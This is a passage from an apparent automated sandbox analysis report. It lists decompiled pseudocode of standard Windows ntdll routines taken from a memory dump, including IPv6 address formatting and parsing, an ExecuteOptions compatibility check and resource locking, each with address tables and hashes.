							_t86 = E02557707(_t128, _t71 - _t128 >> 1, L"::%hs%u.%u.%u.%u", _t115);
							goto L36;
						}
						if(_t114 != 0xffff) {
							_t116 = 0;
							goto L38;
						}
						if(_t114 != 0) {
							_t115 = 0x2529cac;
							goto L35;
						}
						goto L33;
					}
				} else {
					L5:
					_a8 = _t116;
					_a4 = _t116;
					_v12 = _t116;
					if(( *(_t129 + 8) & 0x0000fffd) == 0) {
						if( *(_t129 + 0xa) == 0xfe5e) {
							_v8 = 6;
						}
					}
					_t90 = _v8;
					if(_t90 <= _t116) {
						L11:
						if(_a8 - _a4 <= 1) {
							_a8 = _t116;
							_a4 = _t116;
						}
						_t91 = 0;
						if(_v8 <= _t116) {
							L22:
							if(_v8 < 8) {
								_push( *(_t129 + 0xf) & 0x000000ff);
								_push( *(_t129 + 0xe) & 0x000000ff);
								_push( *(_t129 + 0xd) & 0x000000ff);
								_t128 = _t128 + E02557707(_t128, _t71 - _t128 >> 1, L":%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff) * 2;
							}
							return _t128;
						} else {
							L14:
							L14:
							if(_a4 > _t91 || _t91 >= _a8) {
								if(_t91 != _t116 && _t91 != _a8) {
									_push(":");
									_push(_t71 - _t128 >> 1);
									_push(_t128);
									_t128 = _t128 + E02557707() * 2;
									_t71 = _v20;
									_t130 = _t130 + 0xc;
								}
								_t78 = E02557707(_t128, _t71 - _t128 >> 1, L"%x",  *(_t129 + _t91 * 2) & 0x0000ffff);
								_t130 = _t130 + 0x10;
							} else {
								_push(L"::");
								_push(_t71 - _t128 >> 1);
								_push(_t128);
								_t78 = E02557707();
								_t130 = _t130 + 0xc;
								_t91 = _a8 - 1;
							}
							_t91 = _t91 + 1;
							_t128 = _t128 + _t78 * 2;
							_t71 = _v20;
							if(_t91 >= _v8) {
								goto L22;
							}
							_t116 = 0;
							goto L14;
						}
					} else {
						_t108 = 1;
						_v16 = _t129;
						_v24 = _t90;
						do {
							if( *_v16 == _t116) {
								if(_t108 - _v12 > _a8 - _a4) {
									_a4 = _v12;
									_a8 = _t108;
								}
								_t116 = 0;
							} else {
								_v12 = _t108;
							}
							_v16 = _v16 + 2;
							_t108 = _t108 + 1;
							_t26 =  &_v24;
							 *_t26 = _v24 - 1;
						} while ( *_t26 != 0);
						goto L11;
					}
				}
			}




















                                                0x025613d5
                                                0x025613d9
                                                0x025613dc
                                                0x025613de
                                                0x025613e1
                                                0x025613e8
                                                0x025613ee
                                                0x0258e8fd
                                                0x00000000
                                                0x0258e921
                                                0x0258e921
                                                0x0258e928
                                                0x0258e982
                                                0x0258e98a
                                                0x00000000
                                                0x0258e99a
                                                0x0258e99e
                                                0x0258e9a3
                                                0x0258e9a8
                                                0x0258e9b9
                                                0x0258e978
                                                0x00000000
                                                0x0258e978
                                                0x0258e98a
                                                0x0258e92a
                                                0x0258e931
                                                0x0258e944
                                                0x0258e944
                                                0x0258e950
                                                0x0258e954
                                                0x0258e959
                                                0x0258e95e
                                                0x0258e963
                                                0x0258e970
                                                0x00000000
                                                0x0258e975
                                                0x0258e93b
                                                0x0258e980
                                                0x00000000
                                                0x0258e980
                                                0x0258e942
                                                0x0258e94b
                                                0x00000000
                                                0x0258e94b
                                                0x00000000
                                                0x0258e942
                                                0x025613f4
                                                0x025613f4
                                                0x025613f9
                                                0x025613fc
                                                0x025613ff
                                                0x02561406
                                                0x0258e9cc
                                                0x0258e9d2
                                                0x0258e9d2
                                                0x0258e9cc
                                                0x0256140c
                                                0x02561411
                                                0x02561431
                                                0x0256143a
                                                0x0256143c
                                                0x0256143f
                                                0x0256143f
                                                0x02561442
                                                0x02561447
                                                0x025614a8
                                                0x025614ac
                                                0x0258e9e2
                                                0x0258e9e7
                                                0x0258e9ec
                                                0x0258ea05
                                                0x0258ea05
                                                0x00000000
                                                0x02561449
                                                0x00000000
                                                0x02561449
                                                0x0256144c
                                                0x02561459
                                                0x02561462
                                                0x02561469
                                                0x0256146a
                                                0x02561470
                                                0x02561473
                                                0x02561476
                                                0x02561476
                                                0x02561490
                                                0x02561495
                                                0x0256138e
                                                0x02561390
                                                0x02561397
                                                0x02561398
                                                0x02561399
                                                0x025613a1
                                                0x025613a4
                                                0x025613a4
                                                0x02561498
                                                0x0256149c
                                                0x0256149f
                                                0x025614a2
                                                0x00000000
                                                0x00000000
                                                0x025614a4
                                                0x00000000
                                                0x025614a4
                                                0x02561413
                                                0x02561415
                                                0x02561416
                                                0x02561419
                                                0x0256141c
                                                0x02561422
                                                0x025613b7
                                                0x025613bc
                                                0x025613bf
                                                0x025613bf
                                                0x025613c2
                                                0x02561424
                                                0x02561424
                                                0x02561424
                                                0x02561427
                                                0x0256142b
                                                0x0256142c
                                                0x0256142c
                                                0x0256142c
                                                0x00000000
                                                0x0256141c
                                                0x02561411

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.692498053.0000000002510000.00000040.00000001.sdmp, Offset: 02500000, based on PE: true
                                                • Associated: 00000007.00000002.692491544.0000000002500000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.692568531.00000000025F0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.692576573.0000000002600000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.692583760.0000000002604000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.692590055.0000000002607000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.692596321.0000000002610000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.692632305.0000000002670000.00000040.00000001.sdmp Download File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_2500000_wininit.jbxd
                                                Similarity
                                                • API ID: ___swprintf_l
                                                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                • API String ID: 48624451-2108815105
                                                • Opcode ID: 8e5ac7a7627fdcd07ed08159b0ed4a413e3c7983aa5479391f2e33eaf94146e7
                                                • Instruction ID: 830e0e0b300caa3ebc1a9cb8378918e495e42fb1c863a52432f5175e75c3f489
                                                • Opcode Fuzzy Hash: 8e5ac7a7627fdcd07ed08159b0ed4a413e3c7983aa5479391f2e33eaf94146e7
                                                • Instruction Fuzzy Hash: A3615971E10A55AACF24DF59C8848BEBFB5FF84301B18C42DF49A47780D770A640CB68
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02557EFD, Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 127COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 64%
                                                			E02557EFD(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				char _v540;
				unsigned int _v544;
				signed int _v548;
				intOrPtr _v552;
				char _v556;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t33;
				void* _t38;
				unsigned int _t46;
				unsigned int _t47;
				unsigned int _t52;
				intOrPtr _t56;
				unsigned int _t62;
				void* _t69;
				void* _t70;
				intOrPtr _t72;
				signed int _t73;
				void* _t74;
				void* _t75;
				void* _t76;
				void* _t77;

				_t33 =  *0x2602088; // 0x764b2ec1
				_v8 = _t33 ^ _t73;
				_v548 = _v548 & 0x00000000;
				_t72 = _a4;
				if(E02557F4F(__ecx, _t72 + 0x2c,  &_v548) >= 0) {
					__eflags = _v548;
					if(_v548 == 0) {
						goto L1;
					}
					_t62 = _t72 + 0x24;
					E02573F92(0x55, 3, "CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions\n", _v548);
					_t71 = 0x214;
					_v544 = 0x214;
					E0252DFC0( &_v540, 0, 0x214);
					_t75 = _t74 + 0x20;
					_t46 =  *0x2604218( *((intOrPtr*)(_t72 + 0x28)),  *((intOrPtr*)(_t72 + 0x18)),  *((intOrPtr*)(_t72 + 0x20)), L"ExecuteOptions",  &_v556,  &_v540,  &_v544, _t62);
					__eflags = _t46;
					if(_t46 == 0) {
						goto L1;
					}
					_t47 = _v544;
					__eflags = _t47;
					if(_t47 == 0) {
						goto L1;
					}
					__eflags = _t47 - 0x214;
					if(_t47 >= 0x214) {
						goto L1;
					}
					_push(_t62);
					 *((short*)(_t73 + (_t47 >> 1) * 2 - 0x21a)) = 0;
					E02573F92(0x55, 3, "CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database\n",  &_v540);
					_t52 = E02530D27( &_v540, L"Execute=1");
					_t76 = _t75 + 0x1c;
					_push(_t62);
					__eflags = _t52;
					if(_t52 == 0) {
						E02573F92(0x55, 3, "CLIENT(ntdll): Processing %ws for patching section protection for %wZ\n",  &_v540);
						_t71 =  &_v540;
						_t56 = _t73 + _v544 - 0x218;
						_t77 = _t76 + 0x14;
						_v552 = _t56;
						__eflags = _t71 - _t56;
						if(_t71 >= _t56) {
							goto L1;
						} else {
							goto L10;
						}
						while(1) {
							L10:
							_t62 = E02538375(_t71, 0x20);
							_pop(_t69);
							__eflags = _t62;
							if(__eflags != 0) {
								__eflags = 0;
								 *_t62 = 0;
							}
							E02573F92(0x55, 3, "CLIENT(ntdll): Processing section info %ws...\n", _t71);
							_t77 = _t77 + 0x10;
							E0259E8DB(_t69, _t70, __eflags, _t72, _t71);
							__eflags = _t62;
							if(_t62 == 0) {
								goto L1;
							}
							_t31 = _t62 + 2; // 0x2
							_t71 = _t31;
							__eflags = _t71 - _v552;
							if(_t71 >= _v552) {
								goto L1;
							}
						}
					}
					_push("CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ\n");
					_push(3);
					_push(0x55);
					E02573F92();
					_t38 = 1;
					L2:
					return E0252E1B4(_t38, _t62, _v8 ^ _t73, _t70, _t71, _t72);
				}
				L1:
				_t38 = 0;
				goto L2;
			}



























                                                0x02557f08
                                                0x02557f0f
                                                0x02557f12
                                                0x02557f1b
                                                0x02557f31
                                                0x02573ead
                                                0x02573eb4
                                                0x00000000
                                                0x00000000
                                                0x02573eba
                                                0x02573ecd
                                                0x02573ed2
                                                0x02573ee1
                                                0x02573ee7
                                                0x02573eec
                                                0x02573f12
                                                0x02573f18
                                                0x02573f1a
                                                0x00000000
                                                0x00000000
                                                0x02573f20
                                                0x02573f26
                                                0x02573f28
                                                0x00000000
                                                0x00000000
                                                0x02573f2e
                                                0x02573f30
                                                0x00000000
                                                0x00000000
                                                0x02573f3a
                                                0x02573f3b
                                                0x02573f53
                                                0x02573f64
                                                0x02573f69
                                                0x02573f6c
                                                0x02573f6d
                                                0x02573f6f
                                                0x0257e304
                                                0x0257e30f
                                                0x0257e315
                                                0x0257e31e
                                                0x0257e321
                                                0x0257e327
                                                0x0257e329
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0257e32f
                                                0x0257e32f
                                                0x0257e337
                                                0x0257e33a
                                                0x0257e33b
                                                0x0257e33d
                                                0x0257e33f
                                                0x0257e341
                                                0x0257e341
                                                0x0257e34e
                                                0x0257e353
                                                0x0257e358
                                                0x0257e35d
                                                0x0257e35f
                                                0x00000000
                                                0x00000000
                                                0x0257e365
                                                0x0257e365
                                                0x0257e368
                                                0x0257e36e
                                                0x00000000
                                                0x00000000
                                                0x0257e374
                                                0x0257e32f
                                                0x02573f75
                                                0x02573f7a
                                                0x02573f7c
                                                0x02573f7e
                                                0x02573f86
                                                0x02557f39
                                                0x02557f47
                                                0x02557f47
                                                0x02557f37
                                                0x02557f37
                                                0x00000000

                                                APIs
                                                • BaseQueryModuleData.KERNEL32(?,00000000,00000000,ExecuteOptions,?,?,?), ref: 02573F12
                                                Strings
                                                • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 0257E2FB
                                                • ExecuteOptions, xrefs: 02573F04
                                                • CLIENT(ntdll): Processing section info %ws..., xrefs: 0257E345
                                                • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 02573F4A
                                                • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 02573EC4
                                                • Execute=1, xrefs: 02573F5E
                                                • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 02573F75
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.692498053.0000000002510000.00000040.00000001.sdmp, Offset: 02500000, based on PE: true
                                                • Associated: 00000007.00000002.692491544.0000000002500000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.692568531.00000000025F0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.692576573.0000000002600000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.692583760.0000000002604000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.692590055.0000000002607000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.692596321.0000000002610000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.692632305.0000000002670000.00000040.00000001.sdmp Download File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_2500000_wininit.jbxd
                                                Similarity
                                                • API ID: BaseDataModuleQuery
                                                • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                • API String ID: 3901378454-484625025
                                                • Opcode ID: d8c3af4e61a5218c85cc0b35b77124f4db482ef7f6e67eac814421cb543e8355
                                                • Instruction ID: 68458c7169c1d12f5f40a224a0079539634416c77b0f507c6eabdcd96e5d111c
                                                • Opcode Fuzzy Hash: d8c3af4e61a5218c85cc0b35b77124f4db482ef7f6e67eac814421cb543e8355
                                                • Instruction Fuzzy Hash: 7B41FD7168031D7AEF20DA54DCD9FDA73BDBF59714F000499A505E60C0E770DA458F69
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02560B15, Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 272COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E02560B15(intOrPtr* _a4, char _a7, intOrPtr* _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				void* _t108;
				void* _t116;
				char _t120;
				short _t121;
				void* _t128;
				intOrPtr* _t130;
				char _t132;
				short _t133;
				intOrPtr _t141;
				signed int _t156;
				signed int _t174;
				intOrPtr _t177;
				intOrPtr* _t179;
				intOrPtr _t180;
				void* _t183;

				_t179 = _a4;
				_t141 =  *_t179;
				_v16 = 0;
				_v28 = 0;
				_v8 = 0;
				_v24 = 0;
				_v12 = 0;
				_v32 = 0;
				_v20 = 0;
				if(_t141 == 0) {
					L41:
					 *_a8 = _t179;
					_t180 = _v24;
					if(_t180 != 0) {
						if(_t180 != 3) {
							goto L6;
						}
						_v8 = _v8 + 1;
					}
					_t174 = _v32;
					if(_t174 == 0) {
						if(_v8 == 7) {
							goto L43;
						}
						goto L6;
					}
					L43:
					if(_v16 != 1) {
						if(_v16 != 2) {
							goto L6;
						}
						 *((short*)(_a12 + _v20 * 2)) = 0;
						L47:
						if(_t174 != 0) {
							E02538980(_a12 + 0x10 + (_t174 - _v8) * 2, _a12 + _t174 * 2, _v8 - _t174 + _v8 - _t174);
							_t116 = 8;
							E0252DFC0(_a12 + _t174 * 2, 0, _t116 - _v8 + _t116 - _v8);
						}
						return 0;
					}
					if(_t180 != 0) {
						if(_v12 > 3) {
							goto L6;
						}
						_t120 = E02560CFA(_v28, 0, 0xa);
						_t183 = _t183 + 0xc;
						if(_t120 > 0xff) {
							goto L6;
						}
						 *((char*)(_t180 + _v20 * 2 + _a12)) = _t120;
						goto L47;
					}
					if(_v12 > 4) {
						goto L6;
					}
					_t121 = E02560CFA(_v28, _t180, 0x10);
					_t183 = _t183 + 0xc;
					 *((short*)(_a12 + _v20 * 2)) = _t121;
					goto L47;
				} else {
					while(1) {
						_t123 = _v16;
						if(_t123 == 0) {
							goto L7;
						}
						_t108 = _t123 - 1;
						if(_t108 != 0) {
							goto L1;
						}
						_t178 = _t141;
						if(E025606BA(_t108, _t141) == 0 || _t135 == 0) {
							if(E025606BA(_t135, _t178) == 0 || E02560A5B(_t136, _t178) == 0) {
								if(_t141 != 0x3a) {
									if(_t141 == 0x2e) {
										if(_a7 != 0 || _v24 > 2 || _v8 > 6) {
											goto L41;
										} else {
											_v24 = _v24 + 1;
											L27:
											_v16 = _v16 & 0x00000000;
											L28:
											if(_v28 == 0) {
												goto L20;
											}
											_t177 = _v24;
											if(_t177 != 0) {
												if(_v12 > 3) {
													L6:
													return 0xc000000d;
												}
												_t132 = E02560CFA(_v28, 0, 0xa);
												_t183 = _t183 + 0xc;
												if(_t132 > 0xff) {
													goto L6;
												}
												 *((char*)(_t177 + _v20 * 2 + _a12 - 1)) = _t132;
												goto L20;
											}
											if(_v12 > 4) {
												goto L6;
											}
											_t133 = E02560CFA(_v28, 0, 0x10);
											_t183 = _t183 + 0xc;
											_v20 = _v20 + 1;
											 *((short*)(_a12 + _v20 * 2)) = _t133;
											goto L20;
										}
									}
									goto L41;
								}
								if(_v24 > 0 || _v8 > 6) {
									goto L41;
								} else {
									_t130 = _t179 + 1;
									if( *_t130 == _t141) {
										if(_v32 != 0) {
											goto L41;
										}
										_v32 = _v8 + 1;
										_t156 = 2;
										_v8 = _v8 + _t156;
										L34:
										_t179 = _t130;
										_v16 = _t156;
										goto L28;
									}
									_v8 = _v8 + 1;
									goto L27;
								}
							} else {
								_v12 = _v12 + 1;
								if(_v24 > 0) {
									goto L41;
								}
								_a7 = 1;
								goto L20;
							}
						} else {
							_v12 = _v12 + 1;
							L20:
							_t179 = _t179 + 1;
							_t141 =  *_t179;
							if(_t141 == 0) {
								goto L41;
							}
							continue;
						}
						L7:
						if(_t141 == 0x3a) {
							if(_v24 > 0 || _v8 > 0) {
								goto L41;
							} else {
								_t130 = _t179 + 1;
								if( *_t130 != _t141) {
									goto L41;
								}
								_v20 = _v20 + 1;
								_t156 = 2;
								_v32 = 1;
								_v8 = _t156;
								 *((short*)(_a12 + _v20 * 2)) = 0;
								goto L34;
							}
						}
						L8:
						if(_v8 > 7) {
							goto L41;
						}
						_t142 = _t141;
						if(E025606BA(_t123, _t141) == 0 || _t124 == 0) {
							if(E025606BA(_t124, _t142) == 0 || E02560A5B(_t125, _t142) == 0 || _v24 > 0) {
								goto L41;
							} else {
								_t128 = 1;
								_a7 = 1;
								_v28 = _t179;
								_v16 = 1;
								_v12 = 1;
								L39:
								if(_v16 == _t128) {
									goto L20;
								}
								goto L28;
							}
						} else {
							_a7 = 0;
							_v28 = _t179;
							_v16 = 1;
							_v12 = 1;
							goto L20;
						}
					}
				}
				L1:
				_t123 = _t108 == 1;
				if(_t108 == 1) {
					goto L8;
				}
				_t128 = 1;
				goto L39;
			}

























                                                0x02560b21
                                                0x02560b24
                                                0x02560b27
                                                0x02560b2a
                                                0x02560b2d
                                                0x02560b30
                                                0x02560b33
                                                0x02560b36
                                                0x02560b39
                                                0x02560b3e
                                                0x02560c65
                                                0x02560c68
                                                0x02560c6a
                                                0x02560c6f
                                                0x0258eb42
                                                0x00000000
                                                0x00000000
                                                0x0258eb48
                                                0x0258eb48
                                                0x02560c75
                                                0x02560c7a
                                                0x0258eb54
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0258eb5a
                                                0x02560c80
                                                0x02560c84
                                                0x0258eb98
                                                0x00000000
                                                0x00000000
                                                0x0258eba6
                                                0x02560cb8
                                                0x02560cba
                                                0x02560cd3
                                                0x02560cda
                                                0x02560ce4
                                                0x02560ce9
                                                0x00000000
                                                0x02560cec
                                                0x02560c8c
                                                0x0258eb63
                                                0x00000000
                                                0x00000000
                                                0x0258eb70
                                                0x0258eb75
                                                0x0258eb7d
                                                0x00000000
                                                0x00000000
                                                0x0258eb8c
                                                0x00000000
                                                0x0258eb8c
                                                0x02560c96
                                                0x00000000
                                                0x00000000
                                                0x02560ca2
                                                0x02560cac
                                                0x02560cb4
                                                0x00000000
                                                0x00000000
                                                0x02560b44
                                                0x02560b47
                                                0x02560b49
                                                0x00000000
                                                0x00000000
                                                0x02560b4f
                                                0x02560b50
                                                0x00000000
                                                0x00000000
                                                0x02560b56
                                                0x02560b62
                                                0x02560b7c
                                                0x02560bac
                                                0x02560a0f
                                                0x0258eaaa
                                                0x00000000
                                                0x0258eac4
                                                0x0258eac4
                                                0x02560bd0
                                                0x02560bd0
                                                0x02560bd4
                                                0x02560bd9
                                                0x00000000
                                                0x00000000
                                                0x02560bdb
                                                0x02560be0
                                                0x0258eb0e
                                                0x02560a1a
                                                0x00000000
                                                0x02560a1a
                                                0x0258eb1a
                                                0x0258eb1f
                                                0x0258eb27
                                                0x00000000
                                                0x00000000
                                                0x0258eb36
                                                0x00000000
                                                0x0258eb36
                                                0x02560bea
                                                0x00000000
                                                0x00000000
                                                0x02560bf6
                                                0x02560c00
                                                0x02560c03
                                                0x02560c0b
                                                0x00000000
                                                0x02560c0b
                                                0x0258eaaa
                                                0x00000000
                                                0x02560a15
                                                0x02560bb6
                                                0x00000000
                                                0x02560bc6
                                                0x02560bc6
                                                0x02560bcb
                                                0x02560c15
                                                0x00000000
                                                0x00000000
                                                0x02560c1d
                                                0x02560c20
                                                0x02560c21
                                                0x02560c24
                                                0x02560c24
                                                0x02560c26
                                                0x00000000
                                                0x02560c26
                                                0x02560bcd
                                                0x00000000
                                                0x02560bcd
                                                0x02560b89
                                                0x02560b89
                                                0x02560b90
                                                0x00000000
                                                0x00000000
                                                0x02560b96
                                                0x00000000
                                                0x02560b96
                                                0x02560a04
                                                0x02560a04
                                                0x02560b9a
                                                0x02560b9a
                                                0x02560b9b
                                                0x02560b9f
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x02560ba5
                                                0x02560ac7
                                                0x02560aca
                                                0x0258eacf
                                                0x00000000
                                                0x0258eade
                                                0x0258eade
                                                0x0258eae3
                                                0x00000000
                                                0x00000000
                                                0x0258eaf3
                                                0x0258eaf6
                                                0x0258eaf7
                                                0x0258eafe
                                                0x0258eb01
                                                0x00000000
                                                0x0258eb01
                                                0x0258eacf
                                                0x02560ad0
                                                0x02560ad4
                                                0x00000000
                                                0x00000000
                                                0x02560ada
                                                0x02560ae6
                                                0x02560c34
                                                0x00000000
                                                0x02560c47
                                                0x02560c49
                                                0x02560c4a
                                                0x02560c4e
                                                0x02560c51
                                                0x02560c54
                                                0x02560c57
                                                0x02560c5a
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x02560c60
                                                0x02560afb
                                                0x02560afe
                                                0x02560b02
                                                0x02560b05
                                                0x02560b08
                                                0x00000000
                                                0x02560b08
                                                0x02560ae6
                                                0x02560b44
                                                0x025609f8
                                                0x025609f8
                                                0x025609f9
                                                0x00000000
                                                0x00000000
                                                0x0258eaa0
                                                0x00000000

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.692498053.0000000002510000.00000040.00000001.sdmp, Offset: 02500000, based on PE: true
                                                • Associated: 00000007.00000002.692491544.0000000002500000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.692568531.00000000025F0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.692576573.0000000002600000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.692583760.0000000002604000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.692590055.0000000002607000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.692596321.0000000002610000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.692632305.0000000002670000.00000040.00000001.sdmp Download File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_2500000_wininit.jbxd
                                                Similarity
                                                • API ID: __fassign
                                                • String ID: .$:$:
                                                • API String ID: 3965848254-2308638275
                                                • Opcode ID: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                • Instruction ID: 631800c2962b48370b08025785f14a665e538cd7e061fdb27eff9fdaea9734dd
                                                • Opcode Fuzzy Hash: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                • Instruction Fuzzy Hash: 3FA1B071D0020ADFDF25DF64C8487BEBBBABF45309F24846AD402A72C1D7319689CB59
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02560554, Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 202COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 50%
                                                			E02560554(signed int _a4, char _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int* _t49;
				signed int _t51;
				signed int _t56;
				signed int _t58;
				signed int _t61;
				signed int _t63;
				void* _t66;
				intOrPtr _t67;
				void* _t69;
				signed int _t70;
				void* _t75;
				signed int _t81;
				signed int _t84;
				void* _t86;
				signed int _t93;
				signed int _t96;
				intOrPtr _t105;
				signed int _t107;
				void* _t110;
				signed int _t115;
				signed int* _t119;
				void* _t125;
				void* _t126;
				signed int _t128;
				signed int _t130;
				signed int _t138;
				signed int _t144;
				void* _t158;
				void* _t159;
				void* _t160;

				_t96 = _a4;
				_t115 =  *(_t96 + 0x28);
				_push(_t138);
				if(_t115 < 0) {
					_t105 =  *[fs:0x18];
					__eflags =  *((intOrPtr*)(_t96 + 0x2c)) -  *((intOrPtr*)(_t105 + 0x24));
					if( *((intOrPtr*)(_t96 + 0x2c)) !=  *((intOrPtr*)(_t105 + 0x24))) {
						goto L6;
					} else {
						__eflags = _t115 | 0xffffffff;
						asm("lock xadd [eax], edx");
						return 1;
					}
				} else {
					L6:
					_push(_t128);
					while(1) {
						L7:
						__eflags = _t115;
						if(_t115 >= 0) {
							break;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							__eflags = 0;
							return 0;
						} else {
							 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
							_t49 = _t96 + 0x1c;
							_t106 = 1;
							asm("lock xadd [edx], ecx");
							_t115 =  *(_t96 + 0x28);
							__eflags = _t115;
							if(_t115 < 0) {
								L23:
								_t130 = 0;
								__eflags = 0;
								while(1) {
									_t118 =  *(_t96 + 0x30) & 0x00000001;
									asm("sbb esi, esi");
									_t144 =  !( ~( *(_t96 + 0x30) & 1)) & 0x026001c0;
									_push(_t144);
									_push(0);
									_t51 = E0251F8CC( *((intOrPtr*)(_t96 + 0x18)));
									__eflags = _t51 - 0x102;
									if(_t51 != 0x102) {
										break;
									}
									_t106 =  *(_t144 + 4);
									_t126 =  *_t144;
									_t86 = E02564FC0(_t126,  *(_t144 + 4), 0xff676980, 0xffffffff);
									_push(_t126);
									_push(_t86);
									E02573F92(0x65, 0, "RTL: Acquire Shared Sem Timeout %d(%I64u secs)\n", _t130);
									E02573F92(0x65, 0, "RTL: Resource at %p\n", _t96);
									_t130 = _t130 + 1;
									_t160 = _t158 + 0x28;
									__eflags = _t130 - 2;
									if(__eflags > 0) {
										E025A217A(_t106, __eflags, _t96);
									}
									_push("RTL: Re-Waiting\n");
									_push(0);
									_push(0x65);
									E02573F92();
									_t158 = _t160 + 0xc;
								}
								__eflags = _t51;
								if(__eflags < 0) {
									_push(_t51);
									E02563915(_t96, _t106, _t118, _t130, _t144, __eflags);
									asm("int3");
									while(1) {
										L32:
										__eflags = _a8;
										if(_a8 == 0) {
											break;
										}
										 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
										_t119 = _t96 + 0x24;
										_t107 = 1;
										asm("lock xadd [eax], ecx");
										_t56 =  *(_t96 + 0x28);
										_a4 = _t56;
										__eflags = _t56;
										if(_t56 != 0) {
											L40:
											_t128 = 0;
											__eflags = 0;
											while(1) {
												_t121 =  *(_t96 + 0x30) & 0x00000001;
												asm("sbb esi, esi");
												_t138 =  !( ~( *(_t96 + 0x30) & 1)) & 0x026001c0;
												_push(_t138);
												_push(0);
												_t58 = E0251F8CC( *((intOrPtr*)(_t96 + 0x20)));
												__eflags = _t58 - 0x102;
												if(_t58 != 0x102) {
													break;
												}
												_t107 =  *(_t138 + 4);
												_t125 =  *_t138;
												_t75 = E02564FC0(_t125, _t107, 0xff676980, 0xffffffff);
												_push(_t125);
												_push(_t75);
												E02573F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t128);
												E02573F92(0x65, 0, "RTL: Resource at %p\n", _t96);
												_t128 = _t128 + 1;
												_t159 = _t158 + 0x28;
												__eflags = _t128 - 2;
												if(__eflags > 0) {
													E025A217A(_t107, __eflags, _t96);
												}
												_push("RTL: Re-Waiting\n");
												_push(0);
												_push(0x65);
												E02573F92();
												_t158 = _t159 + 0xc;
											}
											__eflags = _t58;
											if(__eflags < 0) {
												_push(_t58);
												E02563915(_t96, _t107, _t121, _t128, _t138, __eflags);
												asm("int3");
												_t61 =  *_t107;
												 *_t107 = 0;
												__eflags = _t61;
												if(_t61 == 0) {
													L1:
													_t63 = E02545384(_t138 + 0x24);
													if(_t63 != 0) {
														goto L52;
													} else {
														goto L2;
													}
												} else {
													_t123 =  *((intOrPtr*)(_t138 + 0x18));
													_push( &_a4);
													_push(_t61);
													_t70 = E0251F970( *((intOrPtr*)(_t138 + 0x18)));
													__eflags = _t70;
													if(__eflags >= 0) {
														goto L1;
													} else {
														_push(_t70);
														E02563915(_t96,  &_a4, _t123, _t128, _t138, __eflags);
														L52:
